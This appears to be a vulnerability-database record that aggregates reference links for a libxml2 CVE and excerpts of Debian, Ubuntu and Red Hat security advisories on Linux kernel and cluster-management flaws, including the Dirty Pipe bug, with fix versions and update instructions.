"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5e77d7ff7e5e68d6c261fad482d55aba"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-40303"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-40303"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-190",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429429"
},
{
"db": "NVD",
"id": "CVE-2022-40303"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20221209-0003/"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213531"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213533"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213534"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213535"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213536"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/21"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/24"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/25"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/26"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/27"
},
{
"trust": 1.1,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0"
},
{
"trust": 1.1,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/tags/v2.10.3"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2022-40303"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40304"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40303"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-40304"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-43680"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42011"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-35737"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-46848"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46848"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42010"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42012"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-43680"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42012"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2023-22482"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-22482"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35737"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42010"
},
{
"trust": 0.3,
"url": "https://docs.openshift.com/container-platform/latest/cicd/gitops/understanding-openshift-gitops.html"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42011"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-47629"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3821"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3821"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1022224"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-46285"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2953"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-48303"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2879"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2880"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2869"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4415"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2058"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25310"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25309"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2057"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4883"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-44617"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2058"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2519"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2056"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41715"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2056"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2868"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1122"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1122"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2867"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2519"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2057"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0468"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0466"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0467"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-22736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-22736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42849"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42848"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42842"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42855"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42845"
},
{
"trust": 0.1,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42865"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42863"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42851"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42843"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42852"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42856"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42864"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213535."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4238"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3064"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23947"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-47629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3064"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4238"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-41903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-23947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0803"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41903"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5760-2"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5760-1"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429429"
},
{
"db": "VULMON",
"id": "CVE-2022-40303"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170317"
},
{
"db": "PACKETSTORM",
"id": "171043"
},
{
"db": "PACKETSTORM",
"id": "170097"
},
{
"db": "NVD",
"id": "CVE-2022-40303"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-429429",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-40303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171310",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170754",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170753",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170752",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170668",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170317",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171043",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170097",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-40303",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-11-23T00:00:00",
"db": "VULHUB",
"id": "VHN-429429",
"ident": null
},
{
"date": "2023-03-09T15:14:10",
"db": "PACKETSTORM",
"id": "171310",
"ident": null
},
{
"date": "2023-01-26T15:35:03",
"db": "PACKETSTORM",
"id": "170754",
"ident": null
},
{
"date": "2023-01-26T15:34:56",
"db": "PACKETSTORM",
"id": "170753",
"ident": null
},
{
"date": "2023-01-26T15:34:49",
"db": "PACKETSTORM",
"id": "170752",
"ident": null
},
{
"date": "2023-01-24T16:30:22",
"db": "PACKETSTORM",
"id": "170668",
"ident": null
},
{
"date": "2022-12-22T02:12:53",
"db": "PACKETSTORM",
"id": "170317",
"ident": null
},
{
"date": "2023-02-17T16:07:29",
"db": "PACKETSTORM",
"id": "171043",
"ident": null
},
{
"date": "2022-12-05T15:18:44",
"db": "PACKETSTORM",
"id": "170097",
"ident": null
},
{
"date": "2022-11-23T00:15:11.007000",
"db": "NVD",
"id": "CVE-2022-40303",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-11T00:00:00",
"db": "VULHUB",
"id": "VHN-429429",
"ident": null
},
{
"date": "2025-04-29T05:15:43.693000",
"db": "NVD",
"id": "CVE-2022-40303",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2023-1174-01",
"sources": [
{
"db": "PACKETSTORM",
"id": "171310"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "bypass",
"sources": [
{
"db": "PACKETSTORM",
"id": "170752"
}
],
"trust": 0.1
}
}
VAR-202203-0043
Vulnerability from variot - Updated: 2026-04-10 21:54A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. Linux Kernel Has an initialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state.
CVE-2021-43976
Zekun Shen and Brendan Dolan-Gavitt discovered a flaw in the
mwifiex_usb_recv() function of the Marvell WiFi-Ex USB Driver.
CVE-2022-24448
Lyu Tao reported a flaw in the NFS implementation in the Linux
kernel when handling requests to open a directory on a regular file,
which could result in a information leak.
CVE-2022-25258
Szymon Heidrich reported the USB Gadget subsystem lacks certain
validation of interface OS descriptor requests, resulting in memory
corruption.
CVE-2022-25375
Szymon Heidrich reported that the RNDIS USB gadget lacks validation
of the size of the RNDIS_MSG_SET command, resulting in information
leak from kernel memory.
For the stable distribution (bullseye), these problems have been fixed in version 5.10.92-2.
For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmImAChfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0TlAw/+MoL+9zYTlpPOcWp0YMuOkEUJU3WS7udSyTSZLNZsWuQTVmPQ6ed7Fxw/ b0j6OCX9HbrIl4nJdx+7D53ujWC6hS29TLgHCb8d/TEeluXPVI2+4Nt1FcZbSXTJ 6hBNIVVIiDUV9Wco8JUVbvk+y8VCsHxqDEePpEOTZVYLyDUUdti4V7+3ZyO8XQ4/ ePeCX8QQba5FApsz4jG7CkBCxBxyley6YswPV3Zz1FF6L/hGjgluYiKFbO4mLTlX vqwv/UIAZl2rutHzzxyBE5hIlPGXfgksPI7jTmSMRkWI99cIlJWTlziecYLQUiid 2NwOyu2vrut6ZVbtmI5WbTy64Aa9EKguQLd+SbBMuK790nfTLRySaZnU52/1j1MW 1/3Nwq+pDbZ/yAAeV/TS9oKl3mG3XVOO34EGpr9A5aZzCPetyb1TQj0jR5+mjCxy RTxYZuCrisnFvVXXRZLPc1vPcZW+ULXrPQFWEEvd2WKRa6iIkDHf5ef8pHRm36mk 9Yt0x6UmmVWLRRZp7UCbD03NB5p3oJKi+i1h3d+19jQGwU2bEhfOEADCADqlZLwc /6vFZ7TrA/74LXM8MOc5+VQbxL8nGetenPSHuxNwoeXw1ry4+x9KV6YHMqeqQ/qW jFpIOfWS1HQ9vC9t46V2eE0sfrOu2Jvdm4MixwRbXhjzs/REYTY= =MIhw -----END PGP SIGNATURE----- . This update provides security fixes, bug fixes, and updates the container images. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.4.3 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/
Security updates:
-
golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)
-
nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account (CVE-2022-24450)
-
nanoid: Information disclosure via valueOf() function (CVE-2021-23566)
-
nodejs-shelljs: improper privilege management (CVE-2022-0144)
-
search-ui-container: follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)
-
node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)
-
follow-redirects: Exposure of Sensitive Information via Authorization Header leak (CVE-2022-0536)
-
openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates (CVE-2022-0778)
-
imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path (CVE-2022-24778)
-
golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)
-
opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)
Related bugs:
-
RHACM 2.4.3 image files (BZ #2057249)
-
Observability - dashboard name contains
/would cause error when generating dashboard cm (BZ #2032128) -
ACM application placement fails after renaming the application name (BZ
2033051)
-
Disable the obs metric collect should not impact the managed cluster upgrade (BZ #2039197)
-
Observability - cluster list should only contain OCP311 cluster on OCP311 dashboard (BZ #2039820)
-
The value of name label changed from clusterclaim name to cluster name (BZ #2042223)
-
VMWare Cluster creation does not accept ecdsa-sha2-nistp521 ssh keys (BZ
2048500)
-
clusterSelector matchLabels spec are cleared when changing app name/namespace during creating an app in UI (BZ #2053211)
-
Application cluster status is not updated in UI after restoring (BZ
2053279)
-
OpenStack cluster creation is using deprecated floating IP config for 4.7+ (BZ #2056610)
-
The value of Vendor reported by cluster metrics was Other even if the vendor label in managedcluster was Openshift (BZ #2059039)
-
Subscriptions stop reconciling after channel secrets are recreated (BZ
2059954)
-
Placementrule is not reconciling on a new fresh environment (BZ #2074156)
-
The cluster claimed from clusterpool cannot auto imported (BZ #2074543)
-
Bugs fixed (https://bugzilla.redhat.com/):
2024938 - CVE-2021-41190 opencontainers: OCI manifest and index parsing confusion
2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic
2032128 - Observability - dashboard name contains / would cause error when generating dashboard cm
2033051 - ACM application placement fails after renaming the application name
2039197 - disable the obs metric collect should not impact the managed cluster upgrade
2039820 - Observability - cluster list should only contain OCP311 cluster on OCP311 dashboard
2042223 - the value of name label changed from clusterclaim name to cluster name
2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management
2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor
2048500 - VMWare Cluster creation does not accept ecdsa-sha2-nistp521 ssh keys
2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function
2052573 - CVE-2022-24450 nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account
2053211 - clusterSelector matchLabels spec are cleared when changing app name/namespace during creating an app in UI
2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak
2053279 - Application cluster status is not updated in UI after restoring
2056610 - OpenStack cluster creation is using deprecated floating IP config for 4.7+
2057249 - RHACM 2.4.3 images
2059039 - The value of Vendor reported by cluster metrics was Other even if the vendor label in managedcluster was Openshift
2059954 - Subscriptions stop reconciling after channel secrets are recreated
2062202 - CVE-2022-0778 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates
2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server
2069368 - CVE-2022-24778 imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path
2074156 - Placementrule is not reconciling on a new fresh environment
2074543 - The cluster claimed from clusterpool can not auto imported
- See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/
Security updates:
-
nanoid: Information disclosure via valueOf() function (CVE-2021-23566)
-
nodejs-shelljs: improper privilege management (CVE-2022-0144)
-
follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)
-
node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)
-
follow-redirects: Exposure of Sensitive Information via Authorization Header leak (CVE-2022-0536)
Bug fix:
-
RHACM 2.3.8 images (Bugzilla #2062316)
-
Bugs fixed (https://bugzilla.redhat.com/):
2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management 2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor 2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2062316 - RHACM 2.3.8 images
- ========================================================================= Ubuntu Security Notice USN-5362-1 April 01, 2022
linux-intel-5.13 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.04 LTS
Summary:
Several security issues were fixed in the Linux kernel.
Software Description: - linux-intel-5.13: Linux kernel for Intel IOTG
Details:
Nick Gregory discovered that the Linux kernel incorrectly handled network offload functionality. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2022-25636)
Enrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano Giuffrida discovered that hardware mitigations added by ARM to their processors to address Spectre-BTI were insufficient. A local attacker could potentially use this to expose sensitive information. (CVE-2022-23960)
It was discovered that the BPF verifier in the Linux kernel did not properly restrict pointer types in certain situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-23222)
Max Kellermann discovered that the Linux kernel incorrectly handled Unix pipes. A local attacker could potentially use this to modify any file that could be opened for reading. (CVE-2022-0847)
Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. (CVE-2022-0492)
William Liu and Jamie Hill-Daniel discovered that the file system context functionality in the Linux kernel contained an integer underflow vulnerability, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2022-0185)
Enrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano Giuffrida discovered that hardware mitigations added by Intel to their processors to address Spectre-BTI were insufficient. A local attacker could potentially use this to expose sensitive information. (CVE-2022-0001)
Jann Horn discovered a race condition in the Unix domain socket implementation in the Linux kernel that could result in a read-after-free. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-4083)
It was discovered that the NFS server implementation in the Linux kernel contained an out-of-bounds write vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-4090)
Kirill Tkhai discovered that the XFS file system implementation in the Linux kernel did not calculate size correctly when pre-allocating space in some situations. A local attacker could use this to expose sensitive information. (CVE-2021-4155)
It was discovered that the AMD Radeon GPU driver in the Linux kernel did not properly validate writes in the debugfs file system. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-42327)
Sushma Venkatesh Reddy discovered that the Intel i915 graphics driver in the Linux kernel did not perform a GPU TLB flush in some situations. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2022-0330)
Samuel Page discovered that the Transparent Inter-Process Communication (TIPC) protocol implementation in the Linux kernel contained a stack-based buffer overflow. A remote attacker could use this to cause a denial of service (system crash) for systems that have a TIPC bearer configured. (CVE-2022-0435)
It was discovered that the KVM implementation for s390 systems in the Linux kernel did not properly prevent memory operations on PVM guests that were in non-protected mode. A local attacker could use this to obtain unauthorized memory write access. (CVE-2022-0516)
It was discovered that the ICMPv6 implementation in the Linux kernel did not properly deallocate memory in certain situations. A remote attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2022-0742)
It was discovered that the VMware Virtual GPU driver in the Linux kernel did not properly handle certain failure conditions, leading to a stale entry in the file descriptor table. A local attacker could use this to expose sensitive information or possibly gain administrative privileges. (CVE-2022-22942)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 20.04 LTS: linux-image-5.13.0-1010-intel 5.13.0-1010.10 linux-image-intel 5.13.0.1010.11
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://ubuntu.com/security/notices/USN-5362-1 CVE-2021-4083, CVE-2021-4090, CVE-2021-4155, CVE-2021-42327, CVE-2022-0001, CVE-2022-0185, CVE-2022-0330, CVE-2022-0435, CVE-2022-0492, CVE-2022-0516, CVE-2022-0742, CVE-2022-0847, CVE-2022-22942, CVE-2022-23222, CVE-2022-23960, CVE-2022-25636
Package Information: https://launchpad.net/ubuntu/+source/linux-intel-5.13/5.13.0-1010.10 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: kernel-rt security and bug fix update Advisory ID: RHSA-2022:0819-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:0819 Issue date: 2022-03-10 CVE Names: CVE-2021-0920 CVE-2021-4154 CVE-2022-0330 CVE-2022-0435 CVE-2022-0492 CVE-2022-0847 CVE-2022-22942 =====================================================================
- Summary:
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64 Red Hat Enterprise Linux for Real Time (v. 8) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
-
kernel: improper initialization of the "flags" member of the new pipe_buffer (CVE-2022-0847)
-
kernel: Use After Free in unix_gc() which could result in a local privilege escalation (CVE-2021-0920)
-
kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout (CVE-2021-4154)
-
kernel: possible privileges escalation due to missing TLB flush (CVE-2022-0330)
-
kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS (CVE-2022-0435)
-
kernel: cgroups v1 release_agent feature may allow privilege escalation (CVE-2022-0492)
-
kernel: failing usercopy allows for use-after-free exploitation (CVE-2022-22942)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
kernel symbol '__rt_mutex_init' is exported GPL-only in kernel 4.18.0-348.2.1.rt7.132.el8_5 (BZ#2038423)
-
kernel-rt: update RT source tree to the RHEL-8.5.z3 source tree (BZ#2045589)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
